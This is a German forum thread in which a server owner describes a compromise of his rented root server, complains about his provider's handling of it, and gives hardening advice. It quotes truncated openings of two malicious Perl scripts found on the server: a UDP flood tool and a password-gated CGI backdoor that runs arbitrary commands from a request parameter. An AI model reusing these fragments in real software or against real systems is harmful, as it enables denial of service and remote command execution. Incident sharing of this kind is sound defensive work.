Webspace kostenlos für Forum-Hilfe-Mitglieder

Fehler? *lach*
Ich schotte den ab von hier bis Alaska und zurück. Das braucht seine Zeit, weil ich jede bekannte Möglichkeit austesten will, bevor ich den freigebe. Firewall habe ich komplett neu konfiguriert, iptables ergänzt usw.
Ich checke jetzt gerade sämtliche Scripte auf dem Webspace. Übel viel Arbeit...

Und das habe ich auch eben gerade auf meinem Server gefunden:
http://securityresponse.symantec.com/avcenter/venc/…inux.rst.b.html

Nachtrag:
...das ganze mehrfach in unterschiedlichen Verzeichnissen... ganz toll.
Achja und dann noch ein kleines Script. Ich poste mal den Anfang:

#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################


use Socket;


$ARGC=@ARGV;


if ($ARGC !=3) {
 printf "$0 <ip> <port> <time>\n";
 printf "if arg1/2 =0, randports/continous packets.\n";
(...)

DAS waren meine 60 GB Traffic binnen kürzester Zeit. Interessanterweise befindet sich das Script bereits seit 1. Februar auf meinem Server. Da hat jemand lange vorgeplant. Verbindungsdaten über dynamische Einwahl-IPs hat jetzt kein Provider mehr zur Hand, also Rückverfolgung nicht möglich.

So ganz nebenbei fand ich dann noch dies hier:

#!/usr/bin/perl
use CGI qw(:standard);
print header;
$AuthStr=param("booom");
if ($AuthStr eq "carnivores") {
my $k=param("g");
$ll=`$k 2>&1`;
(...)

Habe das auch mal gekürzt... da gehören noch einge andere Dateine dazu, zwei Linux-Dateien und drei php-Scripte.
Bin echt von den Socken, was sich da auf dem Server innerhalb kurzer Zeit abspielte (wenn man mal von dem Script vom 1. Februar absieht).
Jetzt muss ich nur noch herausfinden, was da passiert ist, bzw wie es passieren konnte. Aber ich habe da schon was gefunden, könnte damit zusammen hängen.
Vor einiger Zeit gabs mal einen Angriff, der den Apache kurzfristig überlastete und ich vermute, dass damit eine Lücke entstand, die ausgenutzt werden konnte.
Wer kann mir eventuell sachdienliche Hinweise zu den obigen Scripten geben?

Hallo Markus,

was sich bisher ergeben hat ist, dass ich den Server wieder am Laufen habe, ständig kontrolliere und mit den Zähnen knirsche.
Ich kann mir einen Umzug leider nicht erlauben. Weder finanziell noch vom Risiko her. Denn eines ist klar: Ein kompletter Umzug mit allen Domains und allen Kunden erfordert einen riesigen Aufwand. Alles müsste auf das neue System portiert werden, alle Accounts mit Passwort etc händisch neu eingerichtet werden, sämtliche Kunden von eventuellen Änderungen bei der Administration des eigenen Accounts informiert werden usw.
Dazu kommt die Tatsache, dass auf dem Server spezielle Sachen installiert sind, die ich mit viel Mühen zum Laufen bekam. ZOPE z.B., aber das ist nur eine Sache... da sind noch einige Spezialitäten mehr die nicht zu den grundsätzlichen Eigenschaften eines Rootservers gehören.
Ich werde mir da ganz viel Zeit mit lassen, denn natürlich kommt irgendwann der Tag, wo ich nicht drumherum komme, weil z.B. das System einfach von der Hardware überaltert ist und ich auf was neues umschwenken muss. Aber dann werd ich sicher entsprechend konsequent sein und nicht nur nach neuer Hardware, sondern auch nach alternativen Angeboten Ausschau halten.
Für mich war's einfach eine Unverschämtheit eine Schuld einzupressen, von der ich wusste, dass sie nicht vorhanden ist und mir nicht einmal die Möglichkeit zu geben, den Vorwurf überhaupt in sich zu prüfen. Punktum.
Ich werds ruhig angehen. Server ist abgesichert wie Fort Knox und ständig unter Beobachtung, eine geringe Erhöhung des üblichen Traffics oder der Anzahl ein- oder ausgehender Emails und ich seh es auf meinem Desktop und kann reagieren, noch bevor mich das System mit einer Email verständigt.
Das macht mich etwas ruhiger.
Gruß
webbie

P.S.: Wenn Du auch einen Rootie dort hast, dann solltest Du ganz besonderen Wert auf die Absicherung Deines Systems legen. Das, was von denen als Standard ausgeliefert wird, ist ein Nudelsieb und die Rechenzentren dieser Firma stehen ständig unter Feuer. Ohne eigene Aktivitäten ist es eine Frage der Zeit, bis der Server von Idioten platt gemacht wird. Wenn Du Dich erst in H-Zone wiederfindest, dann ist es zu spät. Ich stand auch schon mal drin....

Für mich ist die Ungezogenheit bei der Sache die Weigerung dem Kunden einzuräumen den Vorwurf in sich zu prüfen. Mein Server liegt komplett in deren Zugriff. Nicht, dass es so ist, aber die könnten jedes Log bearbeiten, jedes Protokoll manipulieren.... und ich kann es mir nicht mal ansehen!
Man muss schon ein gehöriges Vertrauen zu dem Provider haben, um eine solche Unterlassungserklärung blind zu unterschreiben. Und wer hat das schon, wenn der Inhalt dieser Erklärung ja nun nicht gerade vertrauenserweckend erscheint... also irgendwie alles völlig entgegen dem Uhrzeigersinn... nichts passt... alles nur ein Sch... Gefühl.
Möge die Macht mit uns sein... <---Wunschdenken.

Oh ja, verlasse Dich bitte keinesfalls nur auf die Firewall.
Der sicherste Schutz mit einer Firewall ist das Verbot jeden Zugriffs. Einbrecher kommen aber nicht etwa nur durch irgendwelche stillen Ports von hinten durch die kalte Küche... nein, ganz offen von vorn nutzen Sie Sicherheitslücken in Perl-Scripten, also CGI-Programmen, in Frontpage, in PHP oder der verwendeten Verwaltungssoftware und alles über Port 80 und den normalenn Webzugriff via HTTP.
Du stehst ständig unter Beobachtung, der kleinste Bug in irgendeiner verwendeten Software und Du hast die Jungs im System.
Die Firewall sperrt nur die Ports, die nicht verwendet werden sollen. Eigentlich ist die Firewall bei einem gut konfigurierten System völlig überflüssig, denn ein gutes System hat nur Dienste am Laufen, die auch gebraucht werden und nur die Ports aktiv, auf die auch ein Zugriff erfolgen soll.
Für mich taugt die Firewall nur als zusätzlicher Schutz, falls ich irgendwas übersehen haben sollte... einen Schutz gegen Einbrecher ist es nicht.
Achte darauf sämtliche Patches jeder von Dir verwendeten Software zeitnah einzuspielen, ergänze die Firewall durch iptables auf Deinem Server, mache Systemupdates täglich per Cron, belies Dich regelmäßig in einschlägigen und spezialisierten Foren (z.B. Rootforum.de) und prüfe ständig die Logs. Lade Dir Software zum Testen Deiner Sicherheitsvorkehrungen herunter, fertige Prüfsummen Deiner Systemdateien an und und und...
Du wirst nie fertig werden, sei Dir dessen bewusst.
Wenn Du Hilfe brauchst, dann sag Bescheid. Ich bin absolut kein Profi, weiß man grade wie Linux geschrieben wird, aber seit ich den Rootserver habe, habe ich mich da ziemlich eingefuchst... und ich lass nicht locker.
Gruß
webbie

Regelmäßige Bettlektüre für jeden Anfänger mit einem Rootserver sollte das rootforum.de sein.
Zumindest solange, bis einem das Lesen dort zu langweilig wird... so nach dem Motto: Pffft, weiß ich doch längst....
Und die richtige Reihenfolge wäre erst das rootforum studieren und danach den Rootserver. Ich habs falsch rum gemacht

Habs Dir gerade als PN geschrieben:
Gib Gas.... die anderen Herrschaften brauchen keinen Schlaf, die lösen sich gegenseitig ab
Nachdem mein Server für mich wieder zugänglich war, habe ich jeden Zugriff komplett unterbunden (außer für meine eigene IP, klar) und 30 Stunden am Stück dran gearbeitet... erst dann hab ich ihn wieder frei gegeben.

Zitat von Anonymous

webbie,
von RK - hat 1&1 sich wieder beruhigt?

*lach* Was machst DU denn hier??? Ich lach mich tot. Mit Dir hab ich ja nun ganz und gar nicht gerechnet. Aber Deine Frage ist falsch mein Lieber....frag besser, ob ich mich wieder beruhigt habe.
Hm, die Antwort lautet *knirsch* ja *knirsch*
Gruß nach Hamburg und die nähere Umgebung